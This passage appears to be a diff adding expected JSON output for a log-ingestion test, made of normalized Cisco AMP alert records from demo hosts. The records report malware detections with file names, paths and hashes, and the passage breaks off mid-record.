"Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 235387, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:14:54.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668099382575128", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 696000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533668099382575000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 239357, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:14:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258371461578830", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 947000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258371461579000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 240676, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:14:41.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258324216938573", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 403000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258324216938000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 241995, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:14:29.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258272677331020", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 298000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258272677331000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 243314, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:14:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258221137723467", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 270000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258221137723000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 244633, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:14:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258169598115914", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 648000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258169598116000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 245952, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:54.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533667841684537367", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 532000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667841684537000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 247271, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258118058508361", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 636000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258118058508000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 251240, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533667837389570068", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 689000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667837389570000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 252559, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:41.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258066518900808", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 608000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258066518901000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 253878, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:29.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258014979293255", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 581000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258014979293000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 255197, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257963439685702", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 569000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257963439686000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 256516, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:12:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533667579691532307", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 778000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667579691532000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 257835, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:12:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6533667575396565008", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 971000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667575396565000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 261804, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:12:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257843180601413", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 536000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257843180601000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 263122, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:12:48.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f5:8f:96:c3:53:1c" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648166, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f5:8f:96:c3:53:1c" + ], + "cisco.amp.timestamp_nanoseconds": 82375000, + "event.action": "Uninstall", + "event.dataset": "cisco.amp", + "event.id": 834324, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Exploit_Prevention", + "host.name": "Demo_AMP_Exploit_Prevention", + "input.type": "log", + "log.offset": 264441, + "related.hosts": [ + "Demo_AMP_Exploit_Prevention" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + 